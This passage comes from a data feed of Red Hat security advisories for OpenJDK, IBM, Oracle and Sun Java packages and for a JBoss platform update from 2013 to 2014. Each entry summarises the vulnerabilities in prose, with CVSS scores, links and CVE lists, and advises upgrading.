(CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "published": "2013-11-05T05:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1505", "cvelist": ["CVE-2013-3829", "CVE-2013-4002", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5849", "CVE-2013-5850"], "lastseen": "2017-12-25T20:06:15"}, {"id": "RHSA-2013:1509", "type": "redhat", "title": "(RHSA-2013:1509) Important: java-1.5.0-ibm security update", "description": "IBM J2SE version 5.0 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2013-3829, CVE-2013-4041,\nCVE-2013-5372, CVE-2013-5375, CVE-2013-5774, CVE-2013-5778, CVE-2013-5780,\nCVE-2013-5782, CVE-2013-5783, CVE-2013-5790, CVE-2013-5797, CVE-2013-5801,\nCVE-2013-5802, CVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5814,\nCVE-2013-5817, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830, CVE-2013-5840,\nCVE-2013-5842, CVE-2013-5843, CVE-2013-5849)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM J2SE 5.0 SR16-FP4 release. All running\ninstances of IBM Java must be restarted for this update to take effect.\n", "published": "2013-11-07T05:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1509", "cvelist": ["CVE-2013-3829", "CVE-2013-4041", "CVE-2013-5372", "CVE-2013-5375", "CVE-2013-5774", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5801", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5843", "CVE-2013-5849"], "lastseen": "2017-09-09T07:20:11"}, {"id": "RHSA-2013:1447", "type": "redhat", "title": "(RHSA-2013:1447) Important: java-1.7.0-openjdk security update", "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "published": "2013-10-21T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1447", "cvelist": ["CVE-2013-3829", "CVE-2013-4002", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5800", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5851"], "lastseen": "2017-09-09T07:20:27"}, {"id": "RHSA-2013:1451", "type": "redhat", "title": "(RHSA-2013:1451) Critical: java-1.7.0-openjdk security update", "description": "The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "published": "2013-10-22T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1451", "cvelist": ["CVE-2013-3829", "CVE-2013-4002", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5800", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5851"], "lastseen": "2017-11-24T14:07:09"}, {"id": "RHSA-2013:1507", "type": "redhat", "title": "(RHSA-2013:1507) Critical: java-1.7.0-ibm security update", "description": "IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2013-3829, CVE-2013-4041,\nCVE-2013-5372, CVE-2013-5375, CVE-2013-5456, CVE-2013-5457, CVE-2013-5458,\nCVE-2013-5772, CVE-2013-5774, CVE-2013-5776, CVE-2013-5778, CVE-2013-5780,\nCVE-2013-5782, CVE-2013-5783, CVE-2013-5784, CVE-2013-5787, CVE-2013-5788,\nCVE-2013-5789, CVE-2013-5790, CVE-2013-5797, CVE-2013-5800, CVE-2013-5801,\nCVE-2013-5802, CVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5812,\nCVE-2013-5814, CVE-2013-5817, CVE-2013-5818, CVE-2013-5819, CVE-2013-5820,\nCVE-2013-5823, CVE-2013-5824, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830,\nCVE-2013-5831, CVE-2013-5832, CVE-2013-5838, CVE-2013-5840, CVE-2013-5842,\nCVE-2013-5843, CVE-2013-5848, CVE-2013-5849, CVE-2013-5850, CVE-2013-5851)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR6 release. All running\ninstances of IBM Java must be restarted for the update to take effect.\n", "published": "2013-11-07T05:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1507", "cvelist": ["CVE-2013-3829", "CVE-2013-4041", "CVE-2013-5372", "CVE-2013-5375", "CVE-2013-5456", "CVE-2013-5457", "CVE-2013-5458", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5776", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5787", "CVE-2013-5788", "CVE-2013-5789", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5800", "CVE-2013-5801", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5812", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5818", "CVE-2013-5819", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5824", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5831", "CVE-2013-5832", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5843", "CVE-2013-5848", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5851"], "lastseen": "2017-09-08T08:36:31"}, {"id": "RHSA-2013:1793", "type": "redhat", "title": "(RHSA-2013:1793) Low: Red Hat Network Satellite server IBM Java Runtime security update", "description": "This update corrects several security vulnerabilities in the IBM Java\nRuntime Environment shipped as part of Red Hat Network Satellite Server\n5.4, 5.5 and 5.6. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets.\n\nSeveral flaws were fixed in the IBM Java 2 Runtime Environment.\n(CVE-2013-3829, CVE-2013-4041, CVE-2013-5372, CVE-2013-5375, CVE-2013-5457,\nCVE-2013-5772, CVE-2013-5774, CVE-2013-5776, CVE-2013-5778, CVE-2013-5780,\nCVE-2013-5782, CVE-2013-5783, CVE-2013-5784, CVE-2013-5787, CVE-2013-5789,\nCVE-2013-5797, CVE-2013-5801, CVE-2013-5802, CVE-2013-5803, CVE-2013-5804,\nCVE-2013-5809, CVE-2013-5812, CVE-2013-5814, CVE-2013-5817, CVE-2013-5818,\nCVE-2013-5819, CVE-2013-5820, CVE-2013-5823, CVE-2013-5824, CVE-2013-5825,\nCVE-2013-5829, CVE-2013-5830, CVE-2013-5831, CVE-2013-5832, CVE-2013-5840,\nCVE-2013-5842, CVE-2013-5843, CVE-2013-5848, CVE-2013-5849, CVE-2013-5850,\nCVE-2013-5851)\n\nUsers of Red Hat Network Satellite Server 5.4, 5.5 and 5.6 are advised to\nupgrade to these updated packages, which contain the IBM Java SE 6 SR15\nrelease. For this update to take effect, Red Hat Network Satellite Server\nmust be restarted (\"/usr/sbin/rhn-satellite restart\"), as well as all\nrunning instances of IBM Java.\n", "published": "2013-12-05T05:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1793", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5776", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5457", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-03-04T13:18:30"}, {"id": "RHSA-2013:1508", "type": "redhat", "title": "(RHSA-2013:1508) Critical: java-1.6.0-ibm security update", "description": "IBM Java SE version 6 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2013-3829, CVE-2013-4041,\nCVE-2013-5372, CVE-2013-5375, CVE-2013-5457, CVE-2013-5772, CVE-2013-5774,\nCVE-2013-5776, CVE-2013-5778, CVE-2013-5780, CVE-2013-5782, CVE-2013-5783,\nCVE-2013-5784, CVE-2013-5787, CVE-2013-5789, CVE-2013-5797, CVE-2013-5801,\nCVE-2013-5802, CVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5812,\nCVE-2013-5814, CVE-2013-5817, CVE-2013-5818, CVE-2013-5819, CVE-2013-5820,\nCVE-2013-5823, CVE-2013-5824, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830,\nCVE-2013-5831, CVE-2013-5832, CVE-2013-5840, CVE-2013-5842, CVE-2013-5843,\nCVE-2013-5848, CVE-2013-5849, CVE-2013-5850, CVE-2013-5851)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 6 SR15 release. All running\ninstances of IBM Java must be restarted for the update to take effect.\n", "published": "2013-11-07T05:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1508", "cvelist": ["CVE-2013-3829", "CVE-2013-4041", "CVE-2013-5372", "CVE-2013-5375", "CVE-2013-5457", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5776", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5787", "CVE-2013-5789", "CVE-2013-5797", "CVE-2013-5801", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5812", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5818", "CVE-2013-5819", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5824", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5831", "CVE-2013-5832", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5843", "CVE-2013-5848", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5851"], "lastseen": "2017-09-09T07:20:09"}, {"id": "RHSA-2013:1440", "type": "redhat", "title": "(RHSA-2013:1440) Critical: java-1.7.0-oracle security update", "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes several vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section.\n(CVE-2013-3829, CVE-2013-4002, CVE-2013-5772, CVE-2013-5774, CVE-2013-5775,\nCVE-2013-5776, CVE-2013-5777, CVE-2013-5778, CVE-2013-5780, CVE-2013-5782,\nCVE-2013-5783, CVE-2013-5784, CVE-2013-5787, CVE-2013-5788, CVE-2013-5789,\nCVE-2013-5790, CVE-2013-5797, CVE-2013-5800, CVE-2013-5801, CVE-2013-5802,\nCVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5810, CVE-2013-5812,\nCVE-2013-5814, CVE-2013-5817, CVE-2013-5818, CVE-2013-5819, CVE-2013-5820,\nCVE-2013-5823, CVE-2013-5824, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830,\nCVE-2013-5831, CVE-2013-5832, CVE-2013-5838, CVE-2013-5840, CVE-2013-5842,\nCVE-2013-5843, CVE-2013-5844, CVE-2013-5846, CVE-2013-5848, CVE-2013-5849,\nCVE-2013-5850, CVE-2013-5851, CVE-2013-5852, CVE-2013-5854)\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 45 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.\n", "published": "2013-10-17T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2013:1440", "cvelist": ["CVE-2013-3829", "CVE-2013-4002", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5775", "CVE-2013-5776", "CVE-2013-5777", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5787", "CVE-2013-5788", "CVE-2013-5789", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5800", "CVE-2013-5801", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5810", "CVE-2013-5812", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5818", "CVE-2013-5819", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5824", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5831", "CVE-2013-5832", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5843", "CVE-2013-5844", "CVE-2013-5846", "CVE-2013-5848", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5851", "CVE-2013-5852", "CVE-2013-5854"], "lastseen": "2017-09-09T07:20:36"}, {"id": "RHSA-2014:0414", "type": "redhat", "title": "(RHSA-2014:0414) Important: java-1.6.0-sun security update", "description": "Oracle Java SE version 6 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes several vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory pages, listed in the References section.\n(CVE-2013-1500, CVE-2013-1571, CVE-2013-2407, CVE-2013-2412, CVE-2013-2437,\nCVE-2013-2442, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445, CVE-2013-2446,\nCVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451, CVE-2013-2452,\nCVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457,\nCVE-2013-2459, CVE-2013-2461, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,\nCVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-3743, CVE-2013-3829, CVE-2013-4002,\nCVE-2013-5772, CVE-2013-5774, CVE-2013-5776, CVE-2013-5778, CVE-2013-5780,\nCVE-2013-5782, CVE-2013-5783, CVE-2013-5784, CVE-2013-5787, CVE-2013-5789,\nCVE-2013-5790, CVE-2013-5797, CVE-2013-5801, CVE-2013-5802, CVE-2013-5803,\nCVE-2013-5804, CVE-2013-5809, CVE-2013-5812, CVE-2013-5814, CVE-2013-5817,\nCVE-2013-5818, CVE-2013-5819, CVE-2013-5820, CVE-2013-5823, CVE-2013-5824,\nCVE-2013-5825, CVE-2013-5829, CVE-2013-5830, CVE-2013-5831, CVE-2013-5832,\nCVE-2013-5840, CVE-2013-5842, CVE-2013-5843, CVE-2013-5848, CVE-2013-5849,\nCVE-2013-5850, CVE-2013-5852, CVE-2013-5878, CVE-2013-5884, CVE-2013-5887,\nCVE-2013-5888, CVE-2013-5889, CVE-2013-5896, CVE-2013-5898, CVE-2013-5899,\nCVE-2013-5902, CVE-2013-5905, CVE-2013-5906, CVE-2013-5907, CVE-2013-5910,\nCVE-2013-6629, CVE-2013-6954, CVE-2014-0368, CVE-2014-0373, CVE-2014-0375,\nCVE-2014-0376, CVE-2014-0387, CVE-2014-0403, CVE-2014-0410, CVE-2014-0411,\nCVE-2014-0415, CVE-2014-0416, CVE-2014-0417, CVE-2014-0418, CVE-2014-0422,\nCVE-2014-0423, CVE-2014-0424, CVE-2014-0428, CVE-2014-0429, CVE-2014-0446,\nCVE-2014-0449, CVE-2014-0451, CVE-2014-0452, CVE-2014-0453, CVE-2014-0456,\nCVE-2014-0457, CVE-2014-0458, CVE-2014-0460, CVE-2014-0461, CVE-2014-1876,\nCVE-2014-2398, CVE-2014-2401, CVE-2014-2403, CVE-2014-2409, CVE-2014-2412,\nCVE-2014-2414, CVE-2014-2420, CVE-2014-2421, CVE-2014-2423, CVE-2014-2427,\nCVE-2014-2428)\n\nAll users of java-1.6.0-sun are advised to upgrade to these updated\npackages, which provide Oracle Java 6 Update 75 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.", "published": "2014-04-17T15:19:24", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2014:0414", "cvelist": ["CVE-2013-1500", "CVE-2013-1571", "CVE-2013-2407", "CVE-2013-2412", "CVE-2013-2437", "CVE-2013-2442", "CVE-2013-2443", "CVE-2013-2444", "CVE-2013-2445", "CVE-2013-2446", "CVE-2013-2447", "CVE-2013-2448", "CVE-2013-2450", "CVE-2013-2451", "CVE-2013-2452", "CVE-2013-2453", "CVE-2013-2454", "CVE-2013-2455", "CVE-2013-2456", "CVE-2013-2457", "CVE-2013-2459", "CVE-2013-2461", "CVE-2013-2463", "CVE-2013-2464", "CVE-2013-2465", "CVE-2013-2466", "CVE-2013-2468", "CVE-2013-2469", "CVE-2013-2470", "CVE-2013-2471", "CVE-2013-2472", "CVE-2013-2473", "CVE-2013-3743", "CVE-2013-3829", "CVE-2013-4002", "CVE-2013-4578", "CVE-2013-5772", "CVE-2013-5774", "CVE-2013-5776", "CVE-2013-5778", "CVE-2013-5780", "CVE-2013-5782", "CVE-2013-5783", "CVE-2013-5784", "CVE-2013-5787", "CVE-2013-5789", "CVE-2013-5790", "CVE-2013-5797", "CVE-2013-5801", "CVE-2013-5802", "CVE-2013-5803", "CVE-2013-5804", "CVE-2013-5809", "CVE-2013-5812", "CVE-2013-5814", "CVE-2013-5817", "CVE-2013-5818", "CVE-2013-5819", "CVE-2013-5820", "CVE-2013-5823", "CVE-2013-5824", "CVE-2013-5825", "CVE-2013-5829", "CVE-2013-5830", "CVE-2013-5831", "CVE-2013-5832", "CVE-2013-5840", "CVE-2013-5842", "CVE-2013-5843", "CVE-2013-5848", "CVE-2013-5849", "CVE-2013-5850", "CVE-2013-5852", "CVE-2013-5878", "CVE-2013-5884", "CVE-2013-5887", "CVE-2013-5888", "CVE-2013-5889", "CVE-2013-5896", "CVE-2013-5898", "CVE-2013-5899", "CVE-2013-5902", "CVE-2013-5905", "CVE-2013-5906", "CVE-2013-5907", "CVE-2013-5910", "CVE-2013-6629", "CVE-2013-6954", "CVE-2014-0368", "CVE-2014-0373", "CVE-2014-0375", "CVE-2014-0376", "CVE-2014-0387", "CVE-2014-0403", "CVE-2014-0410", "CVE-2014-0411", "CVE-2014-0415", "CVE-2014-0416", "CVE-2014-0417", "CVE-2014-0418", "CVE-2014-0422", "CVE-2014-0423", "CVE-2014-0424", "CVE-2014-0428", "CVE-2014-0429", "CVE-2014-0446", "CVE-2014-0449", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-0453", "CVE-2014-0456", "CVE-2014-0457", "CVE-2014-0458", "CVE-2014-0460", "CVE-2014-0461", "CVE-2014-1876", "CVE-2014-2398", "CVE-2014-2401", "CVE-2014-2403", "CVE-2014-2409", "CVE-2014-2412", "CVE-2014-2414", "CVE-2014-2420", "CVE-2014-2421", "CVE-2014-2423", "CVE-2014-2427", "CVE-2014-2428"], "lastseen": "2018-02-09T16:10:54"}, {"id": "RHSA-2014:1821", "type": "redhat", "title": "(RHSA-2014:1821) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed 